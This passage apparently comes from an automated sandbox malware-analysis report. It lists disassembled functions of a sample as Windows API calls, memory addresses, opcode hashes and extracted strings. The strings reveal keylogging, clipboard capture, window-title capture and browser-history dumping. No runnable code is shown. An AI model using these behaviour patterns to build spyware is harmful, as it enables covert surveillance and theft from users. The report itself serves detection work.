                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0323E253
                                                                                                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0323E26F
                                                                                                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0323E2E6
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0323E30F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 920484758-0
                                                                                                                                                                                    • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                                    • Instruction ID: 4eec95bc8c8fec62cb937b86aa017d009b00ed7450d6a70283e072a271dfd340
                                                                                                                                                                                    • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                                    • Instruction Fuzzy Hash: F441FBBAA1431E9FCB61DB58C890BD9B3BCAF4A600F0541D5E549A7211DA70AFC58F50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,15CDF8C8,?,00000000,?,00000001,?,?,00000001,15CDF8C8,?), ref: 15CF1179
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 15CF1202
                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,15CDAE84,?), ref: 15CF1214
                                                                                                                                                                                    • __freea.LIBCMT ref: 15CF121D
                                                                                                                                                                                      • Part of subcall function 15CE6137: HeapAlloc.KERNEL32(00000000,15CD52BC,?,?,15CD8847,?,?,00000000,15D16B50,?,15CADE62,15CD52BC,?,?,?,?), ref: 15CE6169
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 573072132-0
                                                                                                                                                                                    • Opcode ID: 8aa737d9f628f1103e9df6a5a172368a4fa75fb2ae215da7df231371aaab89e0
                                                                                                                                                                                    • Instruction ID: 5ee314fa7bf7e3809b9323ac08b89fc97f910c451a91c651439528a713b85ca2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8aa737d9f628f1103e9df6a5a172368a4fa75fb2ae215da7df231371aaab89e0
                                                                                                                                                                                    • Instruction Fuzzy Hash: C831F276A0021AABDF15CFA5CC80DEF7BB5EF81610F11496AEC05D7290EB35E961CB90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0323AD15
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0323AD39
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(03230000,?,00000105), ref: 0323AD54
                                                                                                                                                                                    • LoadStringA.USER32 ref: 0323ADEA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3990497365-0
                                                                                                                                                                                    • Opcode ID: bf6fe075587d3865c150b7473ffa3b25560ca353c6d7f5357eac7d8821e995f2
                                                                                                                                                                                    • Instruction ID: 0a88228d4f7f98b5e38711cbfc2c18b6b01241cba0bfada37c18a91b49c2e17c
                                                                                                                                                                                    • Opcode Fuzzy Hash: bf6fe075587d3865c150b7473ffa3b25560ca353c6d7f5357eac7d8821e995f2
                                                                                                                                                                                    • Instruction Fuzzy Hash: D4413EB5A1035C9BDB21EB68DC84BDEB7FCAB0A241F4440E5A548EB251D7B49FC48F50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0323AD15
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0323AD39
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(03230000,?,00000105), ref: 0323AD54
                                                                                                                                                                                    • LoadStringA.USER32 ref: 0323ADEA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3990497365-0
                                                                                                                                                                                    • Opcode ID: e2ba9048c65c16e5c5ad5283d1ed0658297817a96feb6a581377a125007c9ba6
                                                                                                                                                                                    • Instruction ID: b185717d7900ded2b5f25ff5d656c66b7673d47d4206a34ef50043a8cafb4977
                                                                                                                                                                                    • Opcode Fuzzy Hash: e2ba9048c65c16e5c5ad5283d1ed0658297817a96feb6a581377a125007c9ba6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 904132B5A1035C9BDB21EB68DC84BDAB7FC9B0A341F4440E5A548EB251D7B49FC48F50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 15CBC551: GetForegroundWindow.USER32 ref: 15CBC561
                                                                                                                                                                                      • Part of subcall function 15CBC551: GetWindowTextLengthW.USER32 ref: 15CBC56A
                                                                                                                                                                                      • Part of subcall function 15CBC551: GetWindowTextW.USER32 ref: 15CBC594
                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 15CAA573
                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 15CAA5FD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                                                    • String ID: [ $ ]
                                                                                                                                                                                    • API String ID: 3309952895-93608704
                                                                                                                                                                                    • Opcode ID: 6399631bb5f1a7621b8d9772da080d379dbd41f4e153fb8b0f6abd63d3033cc3
                                                                                                                                                                                    • Instruction ID: f43966d7fa8c911a09331f9f48130af6d7f1a00ef0d1e9247e574a71ec79b8e0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6399631bb5f1a7621b8d9772da080d379dbd41f4e153fb8b0f6abd63d3033cc3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E118E3B6142029BC618FE68CC5199FBFA9AF90240F800D1DE553520A0FFA1FA08CBD6
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 15CAA6AB
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,15CAA74D), ref: 15CAA6BA
                                                                                                                                                                                    • Sleep.KERNEL32(00002710,?,?,?,15CAA74D), ref: 15CAA6E7
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CAA6EE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1958988193-0
                                                                                                                                                                                    • Opcode ID: c2f2778b18ed07a02e49b089b2e1d5221d5351f24d21b4a071a971637e080ae0
                                                                                                                                                                                    • Instruction ID: 195ed2b94bcc3b0082c656ec2e9ea02554564dce4d720f49594ebd3699260279
                                                                                                                                                                                    • Opcode Fuzzy Hash: c2f2778b18ed07a02e49b089b2e1d5221d5351f24d21b4a071a971637e080ae0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 85117A33744791AEEA229E6C8CD495E3F7BBF81650F840C09E28346581FF957884CF50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 15CBC49E
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,15CA412F,15D05E74), ref: 15CBC4B2
                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 15CBC4D7
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CBC4E5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3919263394-0
                                                                                                                                                                                    • Opcode ID: 61b395a4b7c9c088915f514727393a4051b61ea3ae7d7b067da6ca09fde507ba
                                                                                                                                                                                    • Instruction ID: fa4d0112e66af5f8a8bc221d02280a1f8ed6887079590038423d34c326d02582
                                                                                                                                                                                    • Opcode Fuzzy Hash: 61b395a4b7c9c088915f514727393a4051b61ea3ae7d7b067da6ca09fde507ba
                                                                                                                                                                                    • Instruction Fuzzy Hash: 08F0C2B620122A7FE6145E65DCD4FBF365CEB86AA4F00092AF901E21C0DF615D058572
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 15CA4066
                                                                                                                                                                                      • Part of subcall function 15CBB978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,15CA407C), ref: 15CBB99F
                                                                                                                                                                                      • Part of subcall function 15CB8568: CloseHandle.KERNEL32(15CA40F5), ref: 15CB857E
                                                                                                                                                                                      • Part of subcall function 15CB8568: CloseHandle.KERNEL32(15D05E74), ref: 15CB8587
                                                                                                                                                                                      • Part of subcall function 15CBC485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 15CBC49E
                                                                                                                                                                                    • Sleep.KERNEL32(000000FA,15D05E74), ref: 15CA4138
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • /sort "Visit Time" /stext ", xrefs: 15CA40B2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                                    • String ID: /sort "Visit Time" /stext "
                                                                                                                                                                                    • API String ID: 368326130-1573945896
                                                                                                                                                                                    • Opcode ID: 445104110a4cb497eedd64782ee445765c902e0cdf62bdc91798a9962211df0d
                                                                                                                                                                                    • Instruction ID: d16052e00f23ea1db393aa0babb95c7bc374f9b6a9805da368ec7b096b08a6f1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 445104110a4cb497eedd64782ee445765c902e0cdf62bdc91798a9962211df0d
                                                                                                                                                                                    • Instruction Fuzzy Hash: E431323BB1015A5BCB14EFB4DC959EEBB7AAF90240F400969E506A7190FF207E49CB91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 15CD4770: __onexit.LIBCMT ref: 15CD4776
                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 15CAB797
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Init_thread_footer__onexit
                                                                                                                                                                                    • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                                                                                    • API String ID: 1881088180-3686566968
                                                                                                                                                                                    • Opcode ID: 47ec4f1adfcc4fb004a6f9d43947d0550d568aa5b58711bfe46aa0657d7c17f3
                                                                                                                                                                                    • Instruction ID: a5ddf35e9b467127057f8e6b0805fa95552a0f1a888547e5a6a673f787d02c41
                                                                                                                                                                                    • Opcode Fuzzy Hash: 47ec4f1adfcc4fb004a6f9d43947d0550d568aa5b58711bfe46aa0657d7c17f3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7321523BA101668ACB14EFA4DCD1DEDBB75AF90254F500D29D50697180FF707D4ACB90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 0936cd44e113f63177a0ec4b258fc5decbcd1320f762c1d7ff510f1f7e5bedee
                                                                                                                                                                                    • Instruction ID: 3d84491de56919c4fd29403502db676fe07c3d8232a43e37b458c58d4777e246
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0936cd44e113f63177a0ec4b258fc5decbcd1320f762c1d7ff510f1f7e5bedee
                                                                                                                                                                                    • Instruction Fuzzy Hash: 14A1D6E77307150BD718FA7C9C843BDB3D59B86221F1C827ED115CB385DB64E9A28290
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,03239596), ref: 0323952E
                                                                                                                                                                                    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 03239534
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DateFormatLocaleThread
                                                                                                                                                                                    • String ID: yyyy
                                                                                                                                                                                    • API String ID: 3303714858-3145165042
                                                                                                                                                                                    • Opcode ID: 024b2543dc4e9ab6c7765e09f4d6bf2e92f1c1ba0ff83f58e862e3c38451a679
                                                                                                                                                                                    • Instruction ID: 70927b6ef061d4c32aa1d02e0b0a1e550398d7c2c5783b1608d10194bb071243
                                                                                                                                                                                    • Opcode Fuzzy Hash: 024b2543dc4e9ab6c7765e09f4d6bf2e92f1c1ba0ff83f58e862e3c38451a679
                                                                                                                                                                                    • Instruction Fuzzy Hash: 172162B5A252189FDB11EF65C841BEEB3B8EF4A710F5100A5E905EB240D7B4DEC0CBA1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 15CAB164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,15D150F0), ref: 15CAB172
                                                                                                                                                                                      • Part of subcall function 15CAB164: wsprintfW.USER32 ref: 15CAB1F3
                                                                                                                                                                                      • Part of subcall function 15CBB4EF: GetLocalTime.KERNEL32(00000000), ref: 15CBB509
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 15CAB0B4
                                                                                                                                                                                    • UnhookWindowsHookEx.USER32 ref: 15CAB0C7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                                                    • String ID: Online Keylogger Stopped
                                                                                                                                                                                    • API String ID: 1623830855-1496645233
                                                                                                                                                                                    • Opcode ID: a3c90d8dee2c5cb3c384ee4350fbf737f624553eadbfca9670ce048952e160b2
                                                                                                                                                                                    • Instruction ID: c0bb586923c02f68d92757cb6946a9b2e6bb9f517ac4337585ced6f60e9c7111
                                                                                                                                                                                    • Opcode Fuzzy Hash: a3c90d8dee2c5cb3c384ee4350fbf737f624553eadbfca9670ce048952e160b2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C01B13BB042665BDB21AF74C81A7BE7FB5AB81104F800C5DD542026C1FFA63459DBD2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,15CA1D55), ref: 15CE0D27
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 15CE0D35
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 15CE0D90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1717984340-0
                                                                                                                                                                                    • Opcode ID: 7ba3155ec167544ff9a3e982c3d4e05681cfc68b79e59779608f0997aff32a35
                                                                                                                                                                                    • Instruction ID: d1e020c1028d5ac728b3cf3db3f3312c6abd287131ebfa857a1ea72aa7dbdbae
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ba3155ec167544ff9a3e982c3d4e05681cfc68b79e59779608f0997aff32a35
                                                                                                                                                                                    • Instruction Fuzzy Hash: DC41F93AA04256AFCF11CF65C844BAA7FB9FF01710F118969F855BB190DB74AA41C7D0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,15CB1EF0), ref: 15CB1B8C
                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000014,15CB1EF0), ref: 15CB1C58
                                                                                                                                                                                    • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 15CB1C7A
                                                                                                                                                                                    • SetLastError.KERNEL32(0000007E,15CB1EF0), ref: 15CB1C91
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4100373531-0
                                                                                                                                                                                    • Opcode ID: c9917f297d98e89dacff4c6a20fe6462e93b2288f8a8b1bade270ea04a8111e6
                                                                                                                                                                                    • Instruction ID: 1ce2a5342009f4762a87e70664afe691a651887253b7431a32c36bcd512423d8
                                                                                                                                                                                    • Opcode Fuzzy Hash: c9917f297d98e89dacff4c6a20fe6462e93b2288f8a8b1bade270ea04a8111e6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C419876608305DFEB14CF59D984B66B3E9FF88754F00082EE98A87651EBB1E904CB51
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 03249FD0
                                                                                                                                                                                    • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 0324A000
                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000008), ref: 0324A01F
                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 0324A02B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Read$Write
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3448952669-0
                                                                                                                                                                                    • Opcode ID: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                                                                                                                    • Instruction ID: 55cae84415b8bded12bff2013675ca099869579e920cb3f02493c2d215ff93fb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6821B7B569131AABDB14CF28CC80B9E73ACFF84351F048555EE109B341E779D8918A94
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:7.4%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                    Total number of Nodes:1471
                                                                                                                                                                                    Total number of Limit Nodes:15
